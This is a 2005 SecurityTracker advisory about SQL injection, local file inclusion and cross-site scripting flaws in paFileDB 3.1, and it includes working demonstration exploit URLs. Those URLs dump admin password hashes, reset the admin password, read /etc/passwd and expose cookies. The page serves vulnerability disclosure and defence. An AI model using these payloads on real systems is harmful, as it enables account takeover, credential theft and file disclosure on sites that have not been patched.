SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   paFileDB Vendors:   PHP Arena
paFileDB Multiple Bugs Permit SQL Injection and Cross-Site Scripting Attacks and Let Remote Users View or Execute Local Files
SecurityTracker Alert ID:  1014209
SecurityTracker URL:  http://securitytracker.com/id/1014209
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 15 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.1 and prior versions
Description:   Several input validation vulnerabilities were reported in paFileDB. A remote user can inject SQL commands. A remote user can conduct cross-site scripting attacks. A remote user can also view or execute files on the target system.

The software does not properly validate user-supplied input. A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database. These flaws require magic quotes gpc to be off to be exploitable.

Some demonstration exploit URLs are provided:

http://[target]/pafiledb.php?action=admin&login=do&formname='%20UNION
%20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf0951522d9',
%20admin_email,%20'1'%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=
%3E%3E+Log+In+%3C%3C&action=admin&login=do

http://[target]/pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+
Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2F
pafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit

http://[target]/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%
201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1
=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit

http://[target]/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&
query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20MD5%281337%28%
20WHERE%201/*

The 'string' parameter in 'search.php' is affected.

The 'pafiledb.php' scripts include files relative to the 'action' parameter without validating the parameter value. A local user can cause the system to include a local file, which may allow a remote user to view files on the target system or to execute local scripting files. A demonstration exploit URL is provided:

http://[target]/pafiledb.php?action=../../../../etc/passwd%00&login=do

Several parameters are not properly filtered to remove HTML code. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the paFileDB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/pafiledb.php?action=viewall&start=20&sortby=name%22
%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[target]/pafiledb.php?action=category&id=1&filelist=%22%3E%3C
script%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[target]/pafiledb.php?action=category&id=1&pages=%22%3E
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

James Bercegay of the GulfTech Security Research Team reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the paFileDB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

A remote user can view files or execute scripting files on the target system with the privileges of the target web service.

Solution:   The vendor has issued a fixed version.

[Editor's note: The fixed version has the same version number as the vulnerable version.]

Vendor URL:  www.phparena.net/pafiledb.php (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents



[Original Message Not Available for Viewing]


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC